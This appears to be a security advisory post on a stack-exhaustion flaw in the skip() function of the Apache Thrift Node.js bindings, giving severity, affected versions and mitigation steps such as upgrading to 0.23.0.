Apache Thrift Node.js bindings vulnerable to stack exhaustion via skip()
TL;DR - Crafted Thrift input triggers uncontrolled recursion in the Node.js skip() function, exhausting the call stack and crashing the process. All Apache Thrift versions before 0.23.0 are affected. Upgrade now.
What happened
Apache Thrift is a cross-language RPC framework - you define a service in an IDL, generate the client and server code, and ship. The Node.js bindings parse incoming Thrift messages, including calling skip() to traverse unknown fields during deserialization.
CVE-2026-41636 is an uncontrolled recursion flaw (CWE-674) in that skip() implementation. An attacker who can send Thrift messages to your service can craft input that drives skip() into unbounded recursion, blowing the stack and killing the process. CVSS v4.0 scores it 8.7 High, with availability impact rated High - which tracks: a single malformed packet, service down.
| Item | Detail |
|---|---|
| Affected component | Apache Thrift Node.js bindings |
| Affected versions | < 0.23.0 |
| Patched version | 0.23.0 |
| Severity | CVSS v4.0 8.7 (High) |
| CVSS vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L |
Recursion bugs in protocol parsers are a recurring headache. When the parser is attacker-controlled, availability becomes a security boundary. This is that scenario.
Who is impacted
- Any service using the Apache Thrift Node.js bindings at version
< 0.23.0. - Highest risk: internet-facing Thrift endpoints that accept untrusted input - public RPC gateways, multi-tenant services, anything reachable from a less-trusted network segment.
What to do now
- Upgrade to
0.23.0. That is the fix."Users are recommended to upgrade to version 0.23.0, which fixes the issue."
- Audit your dependency graph. Check monorepo lockfiles, container images, and deployed artifacts - not just your top-level
package.json. - While the upgrade rolls out, reduce exposure:
- enforce authentication on Thrift endpoints where possible
- apply network policy or firewall rules to limit who can reach them
- add rate limiting to cap how many malformed requests an attacker can send
- Set up monitoring for process crashes and abnormal error rates on Thrift handlers. Probing activity will show up there before a full-blown outage does.
Related
Content is AI-assisted and reviewed by our team, but issues may be missed and best practices evolve rapidly, send corrections to [email protected]. Always consult official documentation and validate key implementation decisions before making design or security choices.